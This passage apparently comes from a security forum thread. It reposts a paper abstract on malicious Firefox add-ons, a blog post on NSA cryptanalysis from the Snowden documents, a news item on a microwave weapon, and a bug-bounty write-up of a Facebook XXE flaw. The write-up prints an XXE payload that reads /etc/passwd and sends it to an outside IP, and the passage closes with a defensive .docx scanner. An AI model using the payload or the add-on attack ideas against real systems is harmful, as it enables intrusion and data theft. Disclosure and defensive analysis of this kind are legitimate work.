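    for (int s = DIRECT_CALL; s <= IAT_CALL; s++) {
        int v = run_sample((enum sample)s);
        printf("%-26s loose=%d strict=%d\n", names[s], v >> 1, v & 1);
    }
    return 0;
}
```

The strict variant is still a heuristic: legitimate register-indirect calls (for example `call esi`) are not covered and would need their own handling to avoid false positives.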
  21. Abusing, Exploiting and Pwning with Firefox Add-ons Ajin Abraham AJINABRAHAM.COM www.keralacyberforce.in ajin25@gmail.com Abstract This paper discusses a number of ways through which hackers can use Mozilla Firefox as a platform to run their malicious piece of code with all the privileges and features as those supported by any native programming language. Also there is an advantage that these malicious codes remain stealthy and undetected against anti-virus solutions. Malicious Firefox add-ons can be coded to serve this purpose. Mozilla Firefox Browser Engine acts just like a compiler or interpreter to execute your codes without much security concerns. The coding technologies for add-on development can be abused and exploited to create malicious add-ons. This paper explains how Firefox’s insecure policies and add-on development technologies like JavaScript, CORS, Web Socket, XPCOM and XPConnect can be abused by a hacker for malicious purposes. The widely popular browser add-ons can be utilized by hackers to implement new malware attack vectors. This paper is supported by proof of concept add-ons which are developed by exploiting the weakness in Firefox add-on coding. The proof of concept includes the implementation of a local keylogger, a remote keylogger, spawning a reverse shell, stealing the Firefox user session data, stealing Linux password files and Distributed Denial of Service (DDoS) Attack. All of these attack vectors are fully undetectable against anti-virus solutions and can bypass filters or protection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/24541.pdf
  22. [h=3]On the new Snowden documents[/h] If you don't follow NSA news obsessively, you might have missed yesterday’s massive Snowden document dump from Der Spiegel. The documents provide a great deal of insight into how the NSA breaks our cryptographic systems. I was very lightly involved in looking at some of this material, so I'm glad to see that it's been published (i.e., I can now stop looking over my shoulder). Unfortunately with so much material, it can be a bit hard to separate the signal from the noise. In this post I’m going to try to do that a little bit -- point out the bits that I think are interesting, the parts that are old news, and the things we should keep an eye on. Background Those who read this blog will know that I’ve been wondering for a long time how NSA works its way around our encryption. This isn't an academic question, since it affects just about everyone who uses technology today. What we've learned since 2013 is that NSA and its partners hoover up vast amounts of Internet traffic from fiber links around the world. Most of this data is plaintext and therefore easy to intercept. But at least some of it is encrypted -- typically protected by protocols such as SSL/TLS or IPSEC. Conventional wisdom pre-Snowden told us that the increasing use of encryption ought to have shut the agencies out of this data trove. Yet the documents we’ve seen so far indicate that the opposite has happened. Instead, the NSA and GCHQ has somehow been harvesting massive amounts of SSL/TLS and IPSEC traffic, and appear to be making inroads into other technologies such as Tor as well. How are they doing this? To repeat an old observation, there are basically three ways to crack an encrypted connection: Go after the mathematics. This is expensive and unlikely to work well against modern encryption algorithms (with a few exceptions). The leaked documents give very little evidence of such mathematical breaks — though a bit more on this below. 
Go after the implementation. The new documents confirm a previously-reported and aggressive effort to undermine commercial cryptographic implementations. The new documents provide context for how important this type of sabotage is to the NSA. Steal the keys. Of course, the easiest way to attack any cryptosystem is simply to steal the keys. Yesterday we received a bit more evidence that this is happening. I can’t possibly spend time on everything that’s covered by these documents — you should go read them yourself — so below I’m just going to focus on the highlights. Not so Good Will Hunting First, the disappointing part. The NSA may be the largest employer of cryptologic mathematicians in the United States, but — if the new story is any indication — those guys really aren’t pulling their weight. In fact, the only significant piece of cryptanalytic news in the entire stack is a 2008 undergraduate research project looking at AES. Sadly, this is about as unexciting as it sounds -- in fact it appears to be nothing more than a summer project by a visiting student. More interesting is the context it gives around the NSA’s efforts to break block ciphers such as AES, including the NSA's view of the difficulty of such cryptanalysis, and confirmation that NSA has some ‘in-house techniques’. Additionally, the documents include significant evidence that NSA has difficulty decrypting certain types of traffic, including Truecrypt, PGP/GPG, Tor and ZRTP from implementations such as RedPhone. Since these protocols share many of the same underlying cryptographic algorithms — RSA, Diffie-Hellman, ECDH and AES — some are presenting this as evidence that those primitives are cryptographically strong. As with the AES note above, this ‘good news’ should also be taken with a grain of salt. With a small number of exceptions, it seems increasingly obvious that the Snowden documents are geared towards NSA’s analysts and operations staff. 
In fact, many of the documents seem geared towards actually protecting knowledge of NSA's cryptanalytic capabilities from NSA's own operational staff (and other Five Eyes partners). As an analyst, it's quite possible you'll never learn why a given intercept was successfully decrypted. To put this a bit more succinctly: the lack of cryptanalytic red meat in these documents may not truly be representative of the NSA’s capabilities. It may simply be an artifact of Edward Snowden's clearances at the time he left the NSA. Tor One of the most surprising aspects of the Snowden documents — to those of us in the security research community anyway — is the NSA’s relative ineptitude when it comes to de-anonymizing users of the Tor anonymous communications network. The reason for our surprise is twofold. First, Tor was never really designed to stand up against a global passive adversary — that is, an attacker who taps a huge number of communications links. If there’s one thing we’ve learned from the Snowden leaks, the NSA (plus GCHQ) is the very definition of the term. In theory at least, Tor should be a relatively easy target for the agency. The real surprise, though, is that despite this huge signals intelligence advantage, the NSA has barely even tested their ability to de-anonymize users. In fact, this leak provides the first concrete evidence that NSA is experimenting with traffic confirmation attacks to find the source of Tor connections. Even more surprising, their techniques are relatively naive, even when compared to what’s going on in the ‘research’ community. This doesn’t mean you should view Tor as secure against the NSA. It seems very obvious that the agency has identified Tor as a high-profile target, and we know they have the resources to make much more headway against the network. The real surprise is that they haven’t tried harder. Maybe they're trying now. SSL/TLS and IPSEC A few months ago I wrote a long post speculating about how the NSA breaks SSL/TLS. 
Because it’s increasingly clear that the NSA does break these protocols, and at relatively large scale.

The new documents don’t tell us much we didn’t already know, but they do confirm the basic outlines of the attack. The first portion requires endpoints around the world that are capable of performing the raw decryption of SSL/TLS sessions provided they know the session keys. The second is a separate infrastructure located on US soil that can recover those session keys when needed.

All of the real magic happens within the key recovery infrastructure. These documents provide the first evidence that a major attack strategy for NSA/GCHQ involves key databases containing the private keys for major sites. For the RSA ciphersuites of TLS, a single private key is sufficient to recover vast amounts of session traffic — in real time or even after the fact.

The interesting question is how the NSA gets those private keys. The easiest answer may be the least technical. A different Snowden leak gives some reason to believe that the NSA may have relationships with employees at specific named U.S. entities, and may even operate personnel “under cover”. This would certainly be one way to build a key database.

But even without the James Bond aspect of this, there’s every reason to believe that NSA has other means to exfiltrate RSA keys from operators. During the period in question, we know of at least one vulnerability (Heartbleed) that could have been used to extract private keys from software TLS implementations. There are still other, unreported vulnerabilities that could be used today.

Pretty much everything I said about SSL/TLS also applies to VPN protocols, with the additional detail that many VPNs use broken protocols and relatively poorly-secured pre-shared secrets. The NSA seems positively gleeful about this.
Open Source packages: Redphone, Truecrypt, PGP and OTR

The documents provide at least circumstantial evidence that some open source encryption technologies may thwart NSA surveillance. These include Truecrypt, ZRTP implementations such as RedPhone, PGP implementations, and Off the Record messaging. These packages have a few commonalities:

• They’re all open source, and relatively well studied by researchers.
• They’re not used at terribly wide scale (as compared to e.g., SSL or VPNs).
• They all work on an end-to-end basis and don’t involve service providers, software distributors, or other infrastructure that could be corrupted or attacked.

What’s at least as interesting is which packages are not included on this list. Major corporate encryption protocols such as iMessage make no appearance in these documents, despite the fact that they ostensibly provide end-to-end encryption. This may be nothing. But given all we know about NSA’s access to providers, this is definitely worrying.

A note on the ethics of the leak

Before I finish, it's worth addressing one major issue with this reporting: are we, as citizens, entitled to this information? Would we be safer keeping it all under wraps? And is this all 'activist nonsense'?

This story, more than some others, skates close to a line. I think it's worth talking about why this information is important.

To sum up a complicated issue, we live in a world where targeted surveillance is probably necessary and inevitable. The evidence so far indicates that NSA is very good at this kind of work, despite some notable failures in actually executing on the intelligence it produces.

Unfortunately, the documents released so far also show that a great deal of NSA/GCHQ surveillance is not targeted at all. Vast amounts of data are scooped up indiscriminately, in the hope that some of it will someday prove useful.
Worse, the NSA decided that this bulk surveillance justifies its efforts to undermine confidence in many of the security technologies that protect our own information systems. The President's own hand-picked review council has strongly recommended this practice be stopped, but their advice has -- to all appearances -- been largely disregarded.

These are matters that are worthy of debate, but this debate largely hasn't happened. Unfortunately, if we can't enact changes to fix these problems, technology is probably about all that's left. Over the next few years encryption technologies are going to be widely deployed, not only by individuals but also by corporations desperately trying to reassure overseas customers who doubt the integrity of US technology.

In that world, it's important to know what works and doesn't work. Insofar as this story tells us that, it makes us all better off.

Posted by Matthew Green at 5:53 PM

Source: A Few Thoughts on Cryptographic Engineering: On the new Snowden documents
  23. @FarSe ?
  24. China turns the microwave oven into a non-lethal weapon capable of causing unbearable pain

Aurelian Mihai - 29 Dec 2014

Mounted on top of a military truck, the device, named Poly WB-1, contains a modified version of the magnetron used to heat food quickly in a microwave oven. Aided by a deflector antenna, the device can transmit a low-intensity beam of radio waves over distances of up to 1 km. The beam, with a wavelength on the order of millimetres, can penetrate only the upper layers of the skin, enough to induce unbearable pain and a burning sensation.

Presented as a non-lethal weapon, Poly WB-1 could be used by the authorities to disperse crowds of protesters and to incapacitate troops on the battlefield, thereby stopping armed conflicts without resorting to lethal weapons. Apparently, the device, too bulky to be included in the equipment of riot-control troops, will be installed only on armoured army vehicles, complementing the traditional water cannons and the arsenal of tear gas.

A similar device called the Raytheon Active Denial System was also tested in the United States in 2007 as a means of crowd control, but it was eventually abandoned because of technical limitations. Apparently, the prototype needed 18 hours to start up and had enormous fuel consumption when running in standby mode.

Probably, negative publicity and the authorities' fear of the public's reaction are enough for now to discourage the use of such a weapon, its existence in China's arsenal serving only as an intimidation factor.

Source: China turns the microwave oven into a non-lethal weapon capable of causing unbearable pain
  25. Facebook hacking using a forged Microsoft Word document

By Delwyn Pinto on December 29, 2014

Mohamed Ramadan, a white hat security researcher, has found a critical vulnerability in Facebook which lets user control using a forged Microsoft Word .docx file. Ramadan has successfully found vulnerabilities in major service providers like Google, Facebook, Twitter, Microsoft etc. and has been rewarded with bug bounty rewards by them.

Known Vulnerabilities

It is a known fact that Facebook does not have the most secure servers in the world. Many people have reported high severity bugs since 2010 and the social network had also patched a dangerous XXE vulnerability affecting OpenID in late 2013.

An XXE (XML External Entity) attack is a method that exploits a weak XML parsing mechanism. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts. You can read more about these fixes here.

Facebook had clarified that it had fixed all of its servers, so finding another XXE vulnerability seemed highly unlikely. Yet Ramadan decided to continue his quest. After some digging, he came onto Facebook’s career page https://www.facebook.com/careers/ . He successfully uploaded his CV onto Facebook but he realized he could only upload files in PDF or .DOCX formats.

A .docx file is basically a set of zipped XML files in a format developed by Microsoft, and Ramadan saw a loophole in Facebook’s security system. He created a fake CV with a forged Microsoft Word document and uploaded it onto the Facebook careers web page. He created an XML file with the following code written in it:

DOCTYPE root [ <!ENTITY % file SYSTEM “file:///etc/passwd”> dtd SYSTEM “http://197.37.102.90/ext.dtd”> %dtd; %send; ]=]=>

Now he had a forged CV ready. He started an HTTP server running on Python on his local machine.
He made a file named ext.dtd waiting in the mohaab007 directory, and here is the content of ext.dtd:

<!ENTITY % all “ x25; send SYSTEM ‘http://197.37.102.90/FACEBOOK-HACKED?%25file;’>” > %all;

After uploading the forged Word CV he waited for a response from the Facebook website. As he states on his blog,

“Now everything is good and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute or so chatting and browsing now it is time to stop python http server and close Facebook and everything. I was going to close my terminal window and I was shocked to see that something connected to my python http server”

He had successfully managed to fool a Facebook server into connecting to his server. In his own words, he could now exploit this connection to:

• DoS the parsing system by making it open, e.g. file:///dev/random | file:///dev/urandom | file://c:/con/con
• TCP scans using HTTP external entities (including behind firewalls since application servers often have worldview different from that of the attacker)
• Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)
• DoS on other systems (if parsing system is allowed to establish TCP connections to other systems)
• NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
• Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
• Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper.

Aftermath

He tried to gain access to system files on the server, but failed to get access, most probably due to security mechanisms in place.
But he was confident that the attack he managed to pull off was a Blind XXE Out Of Band (OOB); plus, it was a time-consuming process because he needed to upload and wait for the result after 15 minutes or more.

Without further ado, he informed the social network of his findings. His findings were rejected outright the first time, with the following words.

He responded to Facebook’s security team by sending them the forged CV, to which FB got back with the following reply:

He still was not satisfied and continued corresponding with the Facebook Security team, which ultimately realised the vulnerability in its file upload mechanism.

Bounty Received

Facebook has acknowledged the vulnerability and, according to its policy, rewarded Ramadan for his research. They fixed the vulnerability by adding this line of code:

“libxml_disable_entity_loader(true)”

Following is a PoC video Ramadan uploaded on YouTube to showcase the vulnerability in Facebook.

Resource: Attack Secure

Source: Hacking Facebook using a forged Microsoft Word document
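A pre-parse gate for the .docx upload path described in the post above, as an added example that is not code from the article, the researcher or Facebook: it rejects any package whose XML parts carry a DTD or entity declaration, complementing the parser-side fix of disabling external entity loading. The names `audit_docx` and `build_docx`, the size limit and both sample packages are assumptions constructed for illustration.

```python
import io
import re
import zipfile

XML_SUFFIXES = (".xml", ".rels")           # OOXML parts a server-side parser will read
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)
MAX_PART_BYTES = 5 * 1024 * 1024           # assumed per-part size limit


def audit_docx(data):
    """Return (part_name, reason) findings; an empty list means the upload may be parsed."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<package>", "not a zip container")]
    findings = []
    with zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            if info.file_size > MAX_PART_BYTES:
                findings.append((info.filename, "part too large"))
                continue
            # Dropping NUL bytes exposes the ASCII marker in UTF-16/UTF-32 parts too.
            raw = zf.read(info).replace(b"\x00", b"")
            if DTD_MARKER.search(raw):
                findings.append((info.filename, "DTD or entity declaration"))
    return findings


def build_docx(document_xml):
    """Build a minimal package in memory (hypothetical helper for the demo)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples: a benign part and one declaring an inert internal entity.
CLEAN = build_docx("<w:document><w:body>CV text</w:body></w:document>")
SUSPECT = build_docx('<!DOCTYPE root [<!ENTITY probe "inert">]><root>&probe;</root>')

if __name__ == "__main__":
    print("clean:  ", audit_docx(CLEAN))
    print("suspect:", audit_docx(SUSPECT))
```

A gate like this runs before any XML parser touches the upload; the parser should still be configured to refuse DTDs and external entities, since the byte scan is a second layer and not a replacement.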